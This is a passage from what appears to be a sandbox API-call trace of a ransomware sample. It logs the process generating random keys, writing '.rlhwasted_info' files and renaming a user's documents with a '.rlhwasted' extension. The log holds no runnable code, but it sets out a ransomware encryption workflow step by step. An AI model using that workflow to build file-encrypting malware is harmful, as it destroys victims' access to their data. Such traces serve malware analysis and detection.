halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\fypftvk vjboec.xls.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0190.178] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0190.179] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.180] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.180] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.180] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.181] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.181] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.225] SetEndOfFile (hFile=0x110) returned 1 [0190.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.227] CloseHandle (hObject=0x110) returned 1 [0190.231] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0190.231] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.232] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.232] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\JbvrjuU fRwx-.pptx") returned 80 [0190.232] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0190.232] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.232] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.232] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.233] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.233] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\JbvrjuU fRwx-.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\jbvrjuu frwx-.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.234] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.235] SetEndOfFile (hFile=0x110) returned 1 [0190.235] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.235] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.235] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\JbvrjuU fRwx-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\jbvrjuu frwx-.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\JbvrjuU fRwx-.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\jbvrjuu frwx-.pptx.rlhwasted")) returned 1 [0190.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\JbvrjuU fRwx-.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\jbvrjuu frwx-.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0190.237] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0190.240] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.241] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fcd88 | out: pbBuffer=0x6fcd88) returned 1 [0190.241] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.241] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.242] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.242] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.253] SetEndOfFile (hFile=0x110) returned 1 [0190.255] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.255] CloseHandle (hObject=0x110) returned 1 [0190.260] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0190.261] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.261] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.262] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\NZFDLW0g7wmnTlZ8.pps") returned 82 [0190.262] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70cfe8 [0190.262] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.262] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.262] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.263] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.263] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\NZFDLW0g7wmnTlZ8.pps.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\nzfdlw0g7wmntlz8.pps.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.269] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.270] SetEndOfFile (hFile=0x10c) returned 1 [0190.270] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.271] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.271] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\NZFDLW0g7wmnTlZ8.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\nzfdlw0g7wmntlz8.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\NZFDLW0g7wmnTlZ8.pps.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\nzfdlw0g7wmntlz8.pps.rlhwasted")) returned 1 [0190.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\NZFDLW0g7wmnTlZ8.pps.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\nzfdlw0g7wmntlz8.pps.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.272] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0190.273] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.274] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fcd88 | out: pbBuffer=0x6fcd88) returned 1 [0190.274] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.274] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.275] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.275] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.284] SetEndOfFile (hFile=0x10c) returned 1 [0190.287] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.287] CloseHandle (hObject=0x10c) returned 1 [0190.291] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0190.291] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.292] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.292] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\smtGMrRVd.xls") returned 75 [0190.292] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a0) returned 0x6ee458 [0190.292] lstrcpyW (in: lpString1=0x6ee4ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.292] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.292] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.293] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.293] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\smtGMrRVd.xls.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\smtgmrrvd.xls.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.294] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.295] SetEndOfFile (hFile=0x10c) returned 1 [0190.295] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.295] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.295] lstrcpyW (in: lpString1=0x6ee4ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\smtGMrRVd.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\smtgmrrvd.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\smtGMrRVd.xls.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\smtgmrrvd.xls.rlhwasted")) returned 1 [0190.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\smtGMrRVd.xls.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\smtgmrrvd.xls.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.297] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0190.300] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.301] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fcd88 | out: pbBuffer=0x6fcd88) returned 1 [0190.301] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.301] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.302] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.302] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.312] SetEndOfFile (hFile=0x10c) returned 1 [0190.347] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.347] CloseHandle (hObject=0x10c) returned 1 [0190.349] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0190.349] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.350] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.350] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Umnge.ots") returned 71 [0190.350] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6ee458 [0190.350] lstrcpyW (in: lpString1=0x6ee4e6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.350] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.350] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.351] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.351] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Umnge.ots.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\umnge.ots.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.352] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.353] SetEndOfFile (hFile=0x10c) returned 1 [0190.353] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.353] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.354] lstrcpyW (in: lpString1=0x6ee4e6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Umnge.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\umnge.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Umnge.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\umnge.ots.rlhwasted")) returned 1 [0190.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Umnge.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\umnge.ots.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0190.355] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0190.358] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.359] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.359] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.359] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.360] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.360] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.370] SetEndOfFile (hFile=0x10c) returned 1 [0190.372] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.372] CloseHandle (hObject=0x10c) returned 1 [0190.377] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0190.377] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.378] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.378] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\wA6Ug05IPSnmR.ppt") returned 79 [0190.378] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6ee458 [0190.379] lstrcpyW (in: lpString1=0x6ee4f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.379] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.379] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0190.379] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.380] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\wA6Ug05IPSnmR.ppt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wa6ug05ipsnmr.ppt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.385] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.387] SetEndOfFile (hFile=0x10c) returned 1 [0190.390] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.390] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.390] lstrcpyW (in: lpString1=0x6ee4f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\wA6Ug05IPSnmR.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wa6ug05ipsnmr.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\wA6Ug05IPSnmR.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wa6ug05ipsnmr.ppt.rlhwasted")) returned 1 [0190.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\wA6Ug05IPSnmR.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\wa6ug05ipsnmr.ppt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.391] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.392] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0190.393] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.393] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.393] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0190.394] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.394] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.405] SetEndOfFile (hFile=0x10c) returned 1 [0190.407] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.407] CloseHandle (hObject=0x10c) returned 1 [0190.412] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0190.413] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0190.414] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.414] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.414] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\Wt0c4y3.rtf") returned 73 [0190.414] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29c) returned 0x6ee458 [0190.414] lstrcpyW (in: lpString1=0x6ee4ea, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.414] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, 